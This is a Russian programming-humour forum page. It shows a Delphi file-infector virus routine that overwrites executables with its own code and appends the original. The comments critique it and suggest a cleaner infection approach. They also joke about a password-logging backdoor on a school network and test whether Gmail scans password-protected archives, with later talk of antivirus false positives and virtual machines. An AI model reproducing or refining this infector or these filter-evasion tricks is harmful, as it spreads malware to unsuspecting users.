- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
procedure infect(victim:string);
var
a:integer;
Buf: array[1..virsize] of byte;
nr,nw:longint;
begin
try
randomize;
assignfile(f1,victim);
a:=random(200);
rename(f1,'bad'+inttostr(a)) ;
filemode :=0;
assignfile(f2,paramstr(0));
reset(f2,1) ;
seek(f2,0);
blockread(f2,buf,virsize);
filemode:=2 ;
closefile(f2);
assignfile(f1,victim);
rewrite(f1,1);
blockwrite(f1,buf,virsize);
assignfile(f2,'bad'+inttostr(a));
reset(f2,1);
seek(f2,0);
repeat
BlockRead(f2, Buf,virsize, NR);
BlockWrite(f1, Buf, NR, NW);
until (NR = 0) or (NW <> NR);
closefile(f1);
closefile(f2);
deletefile(pchar('bad'+inttostr(a)))
except
end;
end;
Ксакеп, нуфф сказал.
http://www.xakep.ru/post/23374/
Stertor 23.03.2014 10:01 # 0
за такое надо руки отрывать.
kipar 23.03.2014 11:25 # −3
Stertor 23.03.2014 11:29 # +3
Я хотел сказать, что нужно выделить 2 блока (1 равный размеру тела, 2 равный размеру жертвы) прочитать себя (уж точно не с помощью BlockRead!!), затем прочитать блок из жертвы. Затем установить файловый указатель на 0, записать себя в жертву, установить файловый указатель на размер тела и записать блок жертвы. Вот и все. То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости, так как в этом случае вирус легко может испортить жертву, что может быть расценено как вредоносный функционал и повлечет для автора куда большие проблемы.
kipar 23.03.2014 11:39 # −3
Stertor 23.03.2014 11:49 # +3
kipar 23.03.2014 15:21 # −1
>То, что автор использует array вместо выделения памяти, многократно открывает/закрывает жертву, пишет в цикле (вкупе с траеблядством) говорит о его безмозглости
Если открыть статью по ссылке, то там каждое второе слово вызывает фейспалм, но указание именно этих трех пунктов вызывает сомнение в мозглости Stertora.
TarasB 23.03.2014 16:06 # +7
Блядская авира именно так и делает с екзешниками размером меньше 100 кб. Видимо эти тупые быдлокодеры считают, что каждый, кто сумел уложить программу в такой размер - охренеть какой кулхацкер!
chtulhu 23.03.2014 16:17 # +6
TarasB 23.03.2014 16:26 # +5
Stertor 23.03.2014 18:27 # +7
Stertor 23.03.2014 18:26 # +1
TarasB 23.03.2014 21:13 # +6
Бля пиздец, я минуснул, и я хочу зайти со всех виртуалов и минуснуть, и ещё заминусовать всех, кто плюсует эту хуйню.
Кто блять назвал это дерьмо лучшим?
Вы знаете, сколько у меня проблем из-за этого дерьма? "Тарас, какой-то высер каких-то дебилов считает твою новую игру вирусом, ПОСОНЫ НЕ КАЧАЙТЕ", меня заебало блять каждый раз объяснять, что у меня вируса нет, вирус есть только в ДНК разработчиков Авиры, ЗАЕБАЛО!!!!
kipar 23.03.2014 21:49 # +1
roman-kashitsyn 23.03.2014 22:02 # +6
Abbath 24.03.2014 01:27 # +3
bormand 24.03.2014 05:22 # 0
Просто. Удали. Ее.
bormand 24.03.2014 06:00 # +1
absolut 24.03.2014 06:53 # +7
inkanus-gray 24.03.2014 06:18 # +2
Ага, злобные буратины ставят подряд все галочки, а потом жалуются, что Авира игры сносит.
bormand 24.03.2014 07:02 # +2
Все правильно, они угрожают свободному времени... Надо тоже авиру поставить.
inkanus-gray 24.03.2014 21:30 # +2
Stertor 24.03.2014 21:39 # +3
Нужно удалять все программы, вешая на них ярлык "потенциально опасная программа", а те, что нельзя удалить(процессы операционки) держать в сохраненном дампе.
Stertor 24.03.2014 11:09 # 0
Stertor 23.03.2014 18:24 # +4
А нельзя потому, что на распаковывание файла из оверлея и его запуск расходуется время, и это будет особенно заметно на слабых машинах( увеличение паузы перед запуском). Во-вторых, вирусу нужно как-то распространяться; в ходу всегда файлы небольшого размера, их таскают на флешках, передают с компа на комп, грузят на торренты. Глупо заражать инсталляционные пакеты и тп. громоздкости. Это нахуй никому не нужно.
Опус номер два. В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается. (Возникла ошибка? Да похуй, идем дальше. Не удалось закрыть открытый файл? Нонсенс, продолжаем.)
Ну словит он исключение на этот трай, и что дальше? Запорол полтораста бинарников, заразил два?
kipar 23.03.2014 19:21 # +1
Грузят на торренты файлы в 300кб? таскают их на флешках? Я слышал что с торрентов качают, а на флешках носят как раз инсталляционные пакеты, если уж говорить об ехе-файлах. Можно конечно сделать вирус заражающий только кейгены, но это как-то не по-какерски.
> В коде этого недодумка есть 1 try на почти на весь код, который вдобавок никак не обрабатывается.
Ну так насчет этого он сам написал - игнорим ошибки. И все правильно же, большинство ошибок будет попытками записать в файл "только для чтения".
А что, интересно, должен делать вирус если возникла ошибка - аварийно завершиться? записать информацию в лог? Процедура при возникновении исключения завершится, т.е. продолжать "портить" файл она и не будет. Честно говоря не вижу отличий от твоего кода ниже, разве что у тебя ошибки ловятся только в момент открытия, а у него - все. И да, {$I-} ты видимо не осилил.
Stertor 23.03.2014 19:28 # −2
>>И да, {$I-} ты видимо не осилил.
Мне это нах не нужно. Я принципиально не пользуюсь обертками.
TarasB 23.03.2014 21:14 # +4
3.14159265 23.03.2014 22:35 # +5
Откуда уверенность что в креках и кейгенах по дефолту не интегрировано никакого зловредного кода?
Любители проприетарного софта на халяву тоже должны платить.
kipar 24.03.2014 00:41 # +3
Stertor 24.03.2014 15:45 # +1
К примеру, аваст (и еще несколько ав, под которые есть кейгены) определяет свои кейгены как трояны, под страшными именами, вроде "win32:zlob" (к слову, один из самых опасных троянов), на поверку же оказывается, что это не более, чем хитрый умысел авторов антивируса. Кашпер вообще кейгены не палит, потому, что их и нет под него - нет смысла извираться.
guest 24.03.2014 15:55 # +1
Stertor 24.03.2014 15:56 # +1
guest 24.03.2014 16:33 # +2
bormand 24.03.2014 17:52 # +2
P.S. А, ну да, туплю, это уже не чистый кейген.
P.P.S. Есть еще полумифическая область - white box криптография. Кто-нибудь читал работы по ней?
guest 24.03.2014 21:48 # +2
bormand 25.03.2014 05:23 # +1
Обычная криптография совсем не предназначена для работы во враждебной среде. Иначе или ключ подменят на свой, или тупо отдебажат и спиздят. Т.е. DRM на чистой криптографии у тебя не получится.
А вот white box (по заверениям авторов) как раз для боевых условий. Из той лапши, которая там генерится и ключ хер выдернешь (даже симметричный), и хрен подменишь его своим.
bormand 24.03.2014 05:21 # +2
3.14159265 24.03.2014 15:18 # +3
gost 24.03.2014 15:20 # +2
Stertor 24.03.2014 15:40 # +1
Программа состоит из исполняемого файла (само приложение) и дополнительных файлов. Нужно установить взламываемую программу на хостовый комп и на систему в виртуалке. Затем запустить патч на виртуалке и скопировать уже обработанное приложение в его рабочую папку на хостовую систему.
guest 24.03.2014 15:55 # +4
Stertor 24.03.2014 16:05 # +1
"Шаганэ ты моя, Шаганэ!
Потому, что я с севера, что ли,
Я готов рассказать тебе поле,
Про волнистую рожь при луне.
Шаганэ ты моя, Шаганэ."
(С. Есенин)
PA3yMHblu_nemyx 26.06.2019 20:04 # 0
bormand 24.03.2014 17:54 # +3
guest 24.03.2014 17:56 # +1
bormand 24.03.2014 18:05 # +2
Ну если там видео не конвертировать и не играться в современные игры - сойдет. Особой разницы в производительности нет.
> те же самые проблемы
Ну не совсем те же самые... Всегда можно откатить снепшот если что-то нехорошее случится. Ну и если там не держать важные файлы и пароли - то и спиздить нечего.
Короче для запуска недоверенного софта со всяких форумов и файлопомоек - само то.
bormand 24.03.2014 18:12 # +1
absolut 24.03.2014 18:35 # +8
для регулярной дефлорации
bormand 24.03.2014 18:19 # +2
В принципе, у нормальной машины памяти и ядер вполне хватает, чтобы гонять 2-3 таких виртуалки одновременно.
guest 24.03.2014 21:51 # +1
Это есть, но если сделать из виртуалки одну большую зону - получишь то же самое, что и на реальном компе.
bormand 25.03.2014 05:24 # +1
Ну это да, согласен.
Abbath 25.03.2014 21:11 # 0
chtulhu 25.03.2014 04:33 # +1
Игори - не проблема. Я недавно настроил vga passthrough и гонял скурим в виртуалке
bormand 25.03.2014 05:24 # +1
А на какой виртуалке?
chtulhu 25.03.2014 06:01 # +1
bormand 25.03.2014 07:24 # +1
А там при vga passthrough поди придется две видюхи юзать? Одну для виртуалки, вторую для хоста?
chtulhu 25.03.2014 07:36 # +1
Да. У меня на хосте недовидия, на госте - радеон. Nvidia Quadro вроде можно разделить между гостями
bormand 25.03.2014 07:38 # +1
Понятно... А интеграшка из проца не прокатит в качестве хостовой?
Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это какому-нибудь эксплойту овладеть хостом?
chtulhu 25.03.2014 07:55 # +1
По идее покатит. Но есть проблема, связанная с захватом устроиств на хосте. Для nvidia-drivers был патч. Как дела обстоят с интелом(?) не знаю.
>Кстати, как у этой схемы с безопасностью? Вредоносный код из виртуалки же будет иметь полный доступ к видюхе. А pci-e устройства, в свою очередь, вроде как имеют доступ к оперативе. Не позволит ли это коду из виртуалки овладеть хостом?
IOMMU по идее не должен давать такой доступ. Да и вирусописателям проще поиметь кучу хомячков, чем возиться с багами kvm. Я не особо задумывался о безопасности, т.к. в виртуалка мне нужна только для игорей, а перезагружаться лень. То есть у меня виртуалка - это относительно доверенная среда.
Кстати, далеко не все материнки с iommu могут в проброс. Тут тоже надо гуглить истории успеха
https://www.linux.org.ru/wiki/en/User:Lindows
https://bbs.archlinux.org/viewtopic.php?id=162768
bormand 25.03.2014 08:21 # +1
Мой проц не умеет в vt-d, да и дискретная видюха - нвидия. Так что придется и дальше жить с дуалбутом для игрушек :(
guest 25.03.2014 22:14 # 0
bormand 25.03.2014 22:17 # 0
Ну да. Ну или KVM цеплять. Или моник с двумя входами, у соседа такой стоит с переключением DVI/VGA кнопкой на морде.
А от двух моников я бы не отказался, это же удобно ;) Просто сейчас стол маловат, не войдет второй моник.
chtulhu 25.03.2014 07:38 # +1
guest 25.03.2014 22:14 # 0
bormand 25.03.2014 22:19 # 0
Ну виртуальную видюху и vga passthrough сравнивать все-таки нечестно. С пробросом видюхи игры должны летать как-будто винда на реальном железе стоит ;)
P.S. Прошел первую мафию в виртуалбоксе, фпс стабильный, лагов и фризов не было.
guest 26.03.2014 21:24 # 0
TarasB 23.03.2014 14:09 # +4
что?
Stertor 23.03.2014 14:23 # +3
файл нужно открыть только 1 раз: чтобы сначала считать, а потом вписать в него инфу.
Другими словами, CreateFile в режиме Generic_Write/File_Share_Write.
Stertor 23.03.2014 14:39 # +3
код писан на коленке, прошу сильно не пинать. Также код содержит намеренные ошибки, чтобы не смущать школоло на грех окаянный.
вирусы такого типа(т.е. писаные ололо) не сохраняют при заражении иконку (к своему стыду, признаю, я тоже не умею это делать), а это большой порок.
TarasB 23.03.2014 14:51 # +4
Stertor 23.03.2014 14:53 # +3
TarasB 23.03.2014 14:57 # +4
KonardinoHuyardino 23.03.2014 13:19 # −28
Stertor 23.03.2014 13:26 # +2
gost 23.03.2014 14:49 # +2
Stertor 23.03.2014 18:41 # +4
p/s/
Я плюсанул твой пост.
guest 24.03.2014 13:11 # +2
Блядь, я не пойму, что за прикол такой - жить в стазисе? Это как нацисты в "Железном небе", все еще верящие в силу своего одоробла-компьютера, когда уже есть смартфоны мощнее их. Нет, я бы еще понял, если бы человек когда-то это выучил и теперь пользовался по инерции, потому что ему и так хватает (вот я пользуюсь cmd - мне оно нужно в основном для подстановки параметров программам, мне хватает), но учить этот пиздец заново вместо чего-то поактуальнее? Двач, кто эти люди, добровольно инвестирующие силы в свою профнепригодность?
guest 24.03.2014 21:55 # +4
Stertor 24.03.2014 21:57 # +1
Команда "format c:\" изменит мир.
guest 24.03.2014 21:59 # +1
Stertor 24.03.2014 22:01 # +1
guest 25.03.2014 02:40 # +1
Можно было, но он удалил один файл, который я мог восстановить, после чего я застремался и отрубил антивирь. Я просто так и не понял - хуле не поставить антивирь на блокирование? Зачем удалять?
Кстати, раз ставилось все раскатыванием образа, то и пароль был одинаковый. Я развлекался через pstools, грохая отдельные проги или explorer с потомками через pskill. Как то даже ухитрился поставить бекдор, пишущий в лог пароли логина шинды.
Stertor 25.03.2014 10:00 # 0
Обычно такие "товарищи" очень упертые, считают себя умнее всех, хотя на деле-ламо масдайное, даже горячие клавиши не все знают.
bormand 25.03.2014 12:09 # 0
Дык это в худшем случае воткнуть флешку\диск и нажать пару-тройку кнопок. Восстановление с образа дело нехитрое.
Stertor 25.03.2014 12:12 # 0
http://www.cheatengine.org/forum/files/itrollu_172.gif
bormand 25.03.2014 12:18 # 0
Всмысле? Поясни идею.
> ставится
Да нихуя там никто ставить не будет... Втыкаешь флешку, жмешь в интерфейсе того же акрониса "раскатать образ", и уходишь на полчасика курить/пить чай/играться. Через полчаса комп девственно чист и никаких вирей на нем не осталось (ну не в биос же ты ему их прошиваешь? ;). Вот и вся работа.
Stertor 25.03.2014 12:19 # 0
bormand 25.03.2014 12:20 # 0
Административные меры всегда были надежней, чем технические.
Stertor 25.03.2014 12:21 # 0
guest 25.03.2014 22:16 # +1
bormand 25.03.2014 05:27 # +2
Stertor 25.03.2014 10:07 # 0
Запрещено отсылать запароленные архивы, исполняемые и еще некоторые типы файлов.
Я заметил, что сервер пытается парсить текст письма (!) , подставляя полученные токены в качестве пароля к архиву. Он делает это с целью расшифровать запароленный архив, чтобы посмотреть, какие файлы он содержит. В частности, архив, содержащий вот такую приписку:
будет распакован и проверен.
absolut 25.03.2014 10:34 # 0
а если зашифровать имена файлов? Походу он не распаковывает, а просто проверяет по имени файла, если находит exe-подобный внутри архива, то просто не пускает. Не обязательно даже распаковывать.
Stertor 25.03.2014 10:38 # 0
absolut 25.03.2014 11:00 # 0
Stertor 25.03.2014 11:05 # 0
absolut 25.03.2014 11:30 # 0
Stertor 25.03.2014 12:02 # 0
absolut 25.03.2014 12:22 # 0
Пароль в теле письма был указан.
Stertor 25.03.2014 12:23 # 0
kipar 25.03.2014 20:00 # 0
Stertor 25.03.2014 20:04 # 0
gost 25.03.2014 20:15 # 0
Посылались:
1. Исполняемый файл в открытую (не вирус).
2. Он же, запакованный в рар без пароля.
3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.
http://prntscr.com/340vla
При отправке ругнулся на .exe, остальные пришли:
http://prntscr.com/340vs6
Stertor 25.03.2014 20:17 # 0
Stertor 25.03.2014 20:21 # 0
[email protected]
gost 25.03.2014 20:30 # 0
Мое фейкомыло.
Stertor 25.03.2014 20:30 # 0
Stertor 25.03.2014 20:42 # 0
guest 25.03.2014 22:26 # 0
bormand 25.03.2014 22:27 # 0
Да.
guest 25.03.2014 11:50 # +2
bormand 25.03.2014 12:10 # 0
Правда тут уже недостаток - на другой стороне их надо переименовывать.
guest 25.03.2014 12:17 # 0
bormand 25.03.2014 12:22 # −1
absolut 25.03.2014 12:25 # +3
это если их не указывать в теле письма конечно :)
guest 25.03.2014 22:17 # +1
Серьезно? Нахуй этот гмейл.
gost 25.03.2014 23:05 # 0
gost 3 часа назад # 0
Провел тест, результат - на моем ящике Gmail не открывает архивы.
Посылались:
1. Исполняемый файл в открытую (не вирус).
2. Он же, запакованный в рар без пароля.
3. Он же, запакованный в рар с паролем 75545, без шифрования названий файлов (нет, в учетку на ГК пытаться входить не надо).
4. Он же, запакованный в рар с паролем 76657, без шифрования названий файлов, пароль указан в тексте письма.
5. Он же, запакованный в рар с паролем 79925, с шифрованием названий файлов, пароль в тексте не указан.
http://prntscr.com/340vla
При отправке ругнулся на .exe, остальные пришли:
http://prntscr.com/340vs6
<<
guest 25.03.2014 22:18 # 0